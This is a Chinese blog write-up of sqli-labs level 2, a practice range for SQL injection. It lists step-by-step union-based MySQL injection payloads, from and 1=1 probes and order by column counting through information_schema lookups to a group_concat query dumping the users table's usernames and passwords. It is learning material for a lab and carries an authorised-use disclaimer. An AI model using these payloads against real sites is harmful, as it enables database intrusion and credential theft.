sqli-labs关卡2(基于get提交的数字型注入)通关思路

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!


一、回顾第一关知识点

上节文章讲到sql注入的最常规思路,(指mysql数据库且针对靶场的思路)先分别用and 1=1 和 and 1=2判断注入点类型,然后order by猜字段数爆显位找注入点位置,其次是联合查询(union select)爆数据库、表、列、数据。依次循序渐进。

二、靶场第二关思路

  • 1、判断注入点
  • 2、爆字段个数
  • 3、爆显位位置
  • 4、爆数据库名、版本、用户等等
  • 5、爆数据库表名
  • 6、爆数据库列名
  • 7、爆数据库数据

1、判断注入点

(如图所示)这里我们老规矩抛出and 1=1 和 and 1=2测试,发现1=1页面正常,1=2报错了。这显然是数字型的sql注入。
在这里插入图片描述
在这里插入图片描述

2.爆字段个数

(如图所示)注入语句为id=1 order by 1 数字1逐次提升发现是4报错。说明字段数为3。
在这里插入图片描述

3、爆显位位置

(如图所示)注入语句为id=-1 union select 1,2,3至于为什么这里id变成-1了,可以看第一关讲解,其实是为了让数据库查询不到信息而返回错误,来巧妙返回我们的注入语句。

在这里插入图片描述

4、爆数据库名、版本、用户等等

(如图所示)注入语句为id=-1 union select 1,user(),database()
这里查询版本就不演示了。

在这里插入图片描述

5、爆数据库表名

(如图所示)注入语句为id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
发现最可疑的表名是users

在这里插入图片描述

6、爆数据库列名

(如图所示)注入语句为id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"
得到最可疑列为password和username

在这里插入图片描述

7、爆数据库数据

(如图所示)注入语句为id=-1 union select 1,group_concat(username),group_concat(password) from users
得到数据
在这里插入图片描述


三、总结

这是基于get提交的数字型注入,与第一关唯一不同的就是一个是字符型,一个是数字型,其他的过程没什么区别。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

无名小卒且不会安全的zzyyhh

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值